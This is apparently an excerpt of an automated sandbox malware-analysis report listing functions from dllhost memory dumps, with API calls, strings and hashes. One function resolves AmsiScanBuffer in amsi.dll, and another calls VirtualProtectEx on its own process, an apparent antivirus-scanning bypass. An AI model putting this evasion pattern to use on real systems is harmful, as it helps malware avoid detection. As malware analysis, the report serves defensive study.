Instruction Fuzzy Hash: 06D06764711F25D5EA28FB95EC6C3642271AB74B03FC4041BC50AC23A4DE3D855BC748

Function 0000025DC1CE1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000025DC1CE1E47
GetProcAddress.KERNEL32 ref: 0000025DC1CE1E57
Sleep.KERNEL32 ref: 0000025DC1CE1E67

Strings

amsi.dll, xrefs: 0000025DC1CE1E40
AmsiScanBuffer, xrefs: 0000025DC1CE1E50

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 32fcce1ea9fc06f50fc70cf5d71f3e4bf1e20a635fc44ac8a26e217e5cd0fc46
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: E9D06714711E20D5EA2CAB91EE5CB54A261BF74B43FD54417F60A822A4DE3C8999D348

Function 0000025DC1AC5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025DC1AC5896

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 01e48bac29b84cacdcabfd52d5518a6f703ce639e26d87711d05678aaf7025ab
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 2B020B32618B90C6EB60CB95F89435ABBA0F3D4796F104116FA8E87BA8DF7DC455CB04

Function 0000025DC1CE5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025DC1CE5896

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8e0c6c64a3287805e1ac12cd4430a9c5e1d706b2d811ac189109d8fcfda46d84
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 9C02E736219F90C6E760CB95E99435AB7A0F794796F104016FA8E87BA8DF7CC494CB04

Function 0000025DC1AC2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000025DC1AC2CAD
TlsGetValue.KERNEL32 ref: 0000025DC1AC2CBC
TlsGetValue.KERNEL32 ref: 0000025DC1AC2CCB
TlsSetValue.KERNEL32 ref: 0000025DC1AC2E0F
TlsSetValue.KERNEL32 ref: 0000025DC1AC2E1E
TlsSetValue.KERNEL32 ref: 0000025DC1AC2E2D

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: e9027cc1b83568338ea3ab293c0b81032d38396c6a35d2d54c6d6288ebc04295
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: BC51C135204F218BEB35DB96AC58A6A73A0F7A4B43F50401BDD4AC3754DB39C84ACB08

Function 0000025DC1CE2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000025DC1CE2CAD
TlsGetValue.KERNEL32 ref: 0000025DC1CE2CBC
TlsGetValue.KERNEL32 ref: 0000025DC1CE2CCB
TlsSetValue.KERNEL32 ref: 0000025DC1CE2E0F
TlsSetValue.KERNEL32 ref: 0000025DC1CE2E1E
TlsSetValue.KERNEL32 ref: 0000025DC1CE2E2D

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: d2fbd03fdabe24f1c4044325d0b96d78f35f9b099f7b3a77332dd579f1ab7cc9
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 0351A336604E2187E374CB96ED48B5AF3A4FBA4B47F50411AEE4A83754DF39C985CB08

Function 0000025DC1AC2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000025DC1AC2AE1
TlsGetValue.KERNEL32 ref: 0000025DC1AC2AF0
TlsGetValue.KERNEL32 ref: 0000025DC1AC2AFF
TlsSetValue.KERNEL32 ref: 0000025DC1AC2C3B
TlsSetValue.KERNEL32 ref: 0000025DC1AC2C4A
TlsSetValue.KERNEL32 ref: 0000025DC1AC2C59

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: af05b21a754011702833c51a0a3e7f06063cb41db7065614cf312f931de0f867
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 42517E35214B6186EB34DFA6EC5862A73A0F7A9B87F40411BDD4AC3754DB39C856CB08

Function 0000025DC1CE2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000025DC1CE2AE1
TlsGetValue.KERNEL32 ref: 0000025DC1CE2AF0
TlsGetValue.KERNEL32 ref: 0000025DC1CE2AFF
TlsSetValue.KERNEL32 ref: 0000025DC1CE2C3B
TlsSetValue.KERNEL32 ref: 0000025DC1CE2C4A
TlsSetValue.KERNEL32 ref: 0000025DC1CE2C59

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: bcc4a473dc99b90a887c7ea6b688f1d3a19d2d941c951f5f75a36d30552b8684
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 4B516C35214E6187E734CF96ED4875AF3A0FBA9B87F40411AEE4A83B54DB38D845CB08

Function 0000025DC1AC5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025DC1AC5E66

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 5ef3b3ba7456089300c740342d55ea255fd31009605e068016aa2c9fe6e06836
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 8F61DB36628B50C6EB70CF95E85831AB7A0F398746F104116FA8D87BA8DB7DC942CF44

Function 0000025DC1CE5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025DC1CE5E66

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 4f087fab8823cbc5673d3d05a97717fde2fda92d248116e2da8c5fa324f0bd7c
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: D861C936529F64C6E770CB95E95831AB7A0F798786F101116FA8D87BA8DB7CC580CB08

Function 0000025DC1AC3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000025DC1AC3A5B), ref: 0000025DC1AC3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1AC3A5B), ref: 0000025DC1AC3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1AC3A5B), ref: 0000025DC1AC3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1AC3A5B), ref: 0000025DC1AC3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1AC3A5B), ref: 0000025DC1AC3F68

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 120a3a61e9b521481b371b0edb1c759a5f904d2a31235dcc5b91780988122d61
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: FE118226604F51C7EF34DB61E80821A67B0FB55B92F044427DE8D87794EB7EC986C788

Function 0000025DC1CE3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000025DC1CE3A5B), ref: 0000025DC1CE3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1CE3A5B), ref: 0000025DC1CE3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1CE3A5B), ref: 0000025DC1CE3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1CE3A5B), ref: 0000025DC1CE3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1CE3A5B), ref: 0000025DC1CE3F68

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 38e69ab22308daa1ae7456ff484f751e4064f44655339dd8387b4b7520d3e91b
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 7D112E26615B5093EB34CBA1E90861AA7B0FB54B82F044027FA9D83794EF7DD994C788

Function 0000025DC1AC8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025DC1AC8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025DC1AC8D62
RtlUnwindEx.NTDLL ref: 0000025DC1AC8DBC

Strings

csm, xrefs: 0000025DC1AC8D49

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 4c3c8c000ff8d9b58207d3768de86427df932d809bc1c7205dbc172b037208e3
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 1151E732311F208ADF68CF95D85C76D7791F364B8BF144112DA4A87788DB7AD852C708

Function 0000025DC1CE8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025DC1CE8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025DC1CE8D62
RtlUnwindEx.NTDLL ref: 0000025DC1CE8DBC

Strings

csm, xrefs: 0000025DC1CE8D49

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: c066c7c92eb1eae260a0ef3743626357e193efd9a293d1e0535eaf988c4d3d70
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2D51F636311E208ADB74CF55EA8CB6CB791FB64B9BF144112FA4987788D779C891C704

Function 0000025DC1ACA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000025DC1ACA75B
_CallSETranslator.LIBVCRUNTIME ref: 0000025DC1ACA7A7

Strings

RCC, xrefs: 0000025DC1ACA777
MOC, xrefs: 0000025DC1ACA76F

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 663bb47588d7a528b950805dbf72785c1f6c0a41adbeacdf110e487fcd1ff7c7
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: FB61B036504FC482DB31CF55E8543AAB7A0F7A4BDAF044216EB9993B95DB39C192CB04

Function 0000025DC1ACAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025DC1ACAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000025DC1ACABBC

Strings

csm, xrefs: 0000025DC1ACAC0E
csm, xrefs: 0000025DC1ACAAF6

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 1727ab960dd3bd650574e698e9da8f025e129805f158415f29d4b79c20d9219a
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: B851AF32204B508BEF74CBA2D96837877A0F364BC7F144117DA9987B95DB3AC852C709

Function 0000025DC1A99EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025DC1A99ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000025DC1A99FBC

Strings

csm, xrefs: 0000025DC1A99EF6
csm, xrefs: 0000025DC1A9A00E

Memory Dump Source

Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: e41938160841b73fcf891f8bbaf2161ffd2cde9ab85c6373f6d365d64e4c72d7
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 60518E32204BA08AEB74DF959948358B7A0F374BA7F144117DA89C7B95CB39C4E3CB09

Function 0000025DC1CEA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000025DC1CEA75B
_CallSETranslator.LIBVCRUNTIME ref: 0000025DC1CEA7A7

Strings

RCC, xrefs: 0000025DC1CEA777
MOC, xrefs: 0000025DC1CEA76F

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 18963d30f4c57578046966c78873675c98cb68d8b4bef455f81fc9d06f7132fd
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: E1618D32504FC489EB308B55E94479AB7A0FBA5B96F044216FB9893B95DB78C1D0CB04

Function 0000025DC1CEAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025DC1CEAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000025DC1CEABBC

Strings

csm, xrefs: 0000025DC1CEAAF6
csm, xrefs: 0000025DC1CEAC0E

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
